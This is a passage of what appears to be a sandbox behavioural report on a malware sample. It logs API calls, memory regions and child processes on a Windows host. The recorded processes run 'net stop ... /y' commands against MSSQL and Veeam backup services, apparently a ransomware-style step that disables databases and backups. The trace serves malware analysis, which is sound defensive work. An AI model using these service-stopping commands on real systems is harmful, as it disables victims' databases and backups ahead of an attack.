_String2="MSSQL$VEEAMSQL2012") returned -14 [0105.156] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.156] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.156] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2012") returned 1 [0105.156] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.156] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.156] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.156] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2012") returned 10 [0105.156] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2012") returned 10 [0105.156] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2012") returned 10 [0105.156] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2012") returned 3 [0105.157] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2012") returned -9 [0105.157] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2012") returned -1 [0105.157] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.157] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.157] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.157] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2012") returned -1 [0105.157] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2012") returned -12 [0105.157] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2012") returned 1 [0105.157] _wcsupr (in: _String="MSSQL$VEEAMSQL2012" | out: _String="MSSQL$VEEAMSQL2012") returned="MSSQL$VEEAMSQL2012" [0105.157] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x31ce30 [0105.194] GetServiceKeyNameW (in: hSCManager=0x31ce30, lpDisplayName="MSSQL$VEEAMSQL2012", lpServiceName=0xff3b5750, lpcchBuffer=0x16f908 | out: lpServiceName="", lpcchBuffer=0x16f908) returned 0 [0105.195] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2012") returned -12 [0105.195] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2012") returned -14 [0105.195] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.195] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.195] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.195] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.195] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2012") returned 5 [0105.195] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2012") returned 10 [0105.195] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2012") returned 10 [0105.195] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2012") returned 10 [0105.195] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2012") returned 3 [0105.195] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2012") returned -9 [0105.195] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2012") returned -1 [0105.195] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.195] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.195] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.195] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2012") returned -1 [0105.195] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2012") returned -12 [0105.195] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2012") returned 1 [0105.195] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2012", opcode=0x0, arg=0x0, bufptr=0x16f910 | out: bufptr=0x16f910) returned 0x889 [0105.196] wcscpy_s (in: _Destination=0xff3b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.196] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0105.197] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3b5b50, nSize=0x800, Arguments=0xff3b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.198] GetFileType (hFile=0xb) returned 0x2 [0105.198] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f7d8 | out: lpMode=0x16f7d8) returned 1 [0105.198] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f7d0, lpReserved=0x0 | out: lpBuffer=0xff3b5b50*, lpNumberOfCharsWritten=0x16f7d0*=0x1e) returned 1 [0105.199] GetFileType (hFile=0xb) returned 0x2 [0105.199] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f7d8 | out: lpMode=0x16f7d8) returned 1 [0105.199] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff391efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f7d0, lpReserved=0x0 | out: lpBuffer=0xff391efc*, lpNumberOfCharsWritten=0x16f7d0*=0x2) returned 1 [0105.199] _ultow (in: _Dest=0x889, _Radix=1505344 | out: _Dest=0x889) returned="2185" [0105.199] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3b5b50, nSize=0x800, Arguments=0xff3b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.199] GetFileType (hFile=0xb) returned 0x2 [0105.200] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f7d8 | out: lpMode=0x16f7d8) returned 1 [0105.200] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16f7d0, lpReserved=0x0 | out: lpBuffer=0xff3b5b50*, lpNumberOfCharsWritten=0x16f7d0*=0x34) returned 1 [0105.200] GetFileType (hFile=0xb) returned 0x2 [0105.200] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f7d8 | out: lpMode=0x16f7d8) returned 1 [0105.201] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff391efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f7d0, lpReserved=0x0 | out: lpBuffer=0xff391efc*, lpNumberOfCharsWritten=0x16f7d0*=0x2) returned 1 [0105.201] NetApiBufferFree (Buffer=0x314d60) returned 0x0 [0105.201] NetApiBufferFree (Buffer=0x31c120) returned 0x0 [0105.201] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" [0105.201] exit (_Code=2) Process: id = "206" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5c0a5000" os_pid = "0xc68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8194 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8195 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8196 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8197 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8198 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8199 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8200 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8201 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8202 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8203 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8204 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 8205 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8206 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8207 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8208 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 659 os_tid = 0x7e0 Process: id = "207" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5c46b000" os_pid = "0x81c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "199" os_parent_pid = "0x90c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8228 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8229 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8230 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8231 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 8232 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8233 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8234 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8235 start_va = 0xff4c0000 end_va = 0xff4f2fff entry_point = 0xff4c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8236 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8237 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8238 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 8239 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8240 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8241 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8242 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8308 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8309 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8310 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8311 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8312 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 8313 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8314 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8315 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8316 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8317 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8318 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8319 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8320 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8321 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8322 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8323 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8324 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8325 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8326 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8327 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8328 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8329 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8330 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8331 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 661 os_tid = 0xc1c [0105.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af9d0 | out: lpSystemTimeAsFileTime=0x1af9d0*(dwLowDateTime=0xf40c95b0, dwHighDateTime=0x1d48689)) [0105.522] GetCurrentProcessId () returned 0x81c [0105.522] GetCurrentThreadId () returned 0xc1c [0105.522] GetTickCount () returned 0x241fe [0105.522] QueryPerformanceCounter (in: lpPerformanceCount=0x1af9d8 | out: lpPerformanceCount=0x1af9d8*=1815244100000) returned 1 [0105.524] GetModuleHandleW (lpModuleName=0x0) returned 0xff4c0000 [0105.524] __set_app_type (_Type=0x1) [0105.524] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4d9c9c) returned 0x0 [0105.524] __getmainargs (in: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788, _DoWildCard=0, _StartInfo=0xff4e479c | out: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788) returned 0 [0105.524] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.525] GetConsoleOutputCP () returned 0x1b5 [0105.525] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4ecec0 | out: lpCPInfo=0xff4ecec0) returned 1 [0105.525] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.527] sprintf_s (in: _DstBuf=0x1af978, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.527] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0105.529] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0105.529] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher /y" [0105.529] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af710, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0105.529] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.529] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af968 | out: Buffer=0x1af968*=0x224d50) returned 0x0 [0105.529] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af968 | out: Buffer=0x1af968*=0x22c100) returned 0x0 [0105.530] _fileno (_File=0x7fefdba2a80) returned 0 [0105.530] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0105.530] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.530] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.530] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.530] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.530] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.530] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.530] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.530] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.530] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.530] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.530] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.531] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.531] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.531] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.531] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.531] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.531] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.531] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.531] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.531] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.531] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.531] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher") returned -12 [0105.531] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher") returned -10 [0105.531] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher") returned -10 [0105.531] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher") returned -10 [0105.531] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher") returned -10 [0105.531] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher") returned -7 [0105.531] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher") returned -7 [0105.531] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher") returned -6 [0105.531] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher") returned -6 [0105.531] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher") returned -5 [0105.531] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher") returned -5 [0105.531] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher") returned -1 [0105.531] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher") returned 3 [0105.531] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher") returned 6 [0105.531] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher") returned 7 [0105.532] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher") returned 8 [0105.532] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher") returned 8 [0105.532] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher") returned -12 [0105.532] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher") returned -14 [0105.532] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher") returned 5 [0105.532] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher") returned 5 [0105.532] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher") returned 1 [0105.532] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher") returned 5 [0105.532] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher") returned 5 [0105.532] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher") returned 5 [0105.532] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher") returned 10 [0105.532] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher") returned 10 [0105.532] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher") returned 10 [0105.532] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher") returned 3 [0105.532] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher") returned -9 [0105.532] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher") returned -1 [0105.532] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher") returned 6 [0105.532] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher") returned -1 [0105.532] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher") returned -12 [0105.532] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher") returned 1 [0105.533] _wcsupr (in: _String="MSSQLFDLauncher" | out: _String="MSSQLFDLAUNCHER") returned="MSSQLFDLAUNCHER" [0105.533] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x22ce10 [0105.537] GetServiceKeyNameW (in: hSCManager=0x22ce10, lpDisplayName="MSSQLFDLAUNCHER", lpServiceName=0xff4e5750, lpcchBuffer=0x1af888 | out: lpServiceName="", lpcchBuffer=0x1af888) returned 0 [0105.538] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER") returned -12 [0105.538] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER") returned -14 [0105.538] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER") returned 5 [0105.538] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER") returned 5 [0105.538] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER") returned 5 [0105.538] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER") returned 5 [0105.538] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER") returned 5 [0105.538] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER") returned 10 [0105.538] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER") returned 10 [0105.538] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER") returned 10 [0105.539] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER") returned 3 [0105.539] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER") returned -9 [0105.539] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER") returned -1 [0105.539] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER") returned 6 [0105.539] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER") returned 6 [0105.539] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER") returned 6 [0105.539] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER") returned -1 [0105.539] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER") returned -12 [0105.539] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER") returned 1 [0105.539] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER", opcode=0x0, arg=0x0, bufptr=0x1af890 | out: bufptr=0x1af890) returned 0x889 [0105.540] wcscpy_s (in: _Destination=0xff4e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.540] LoadLibraryW 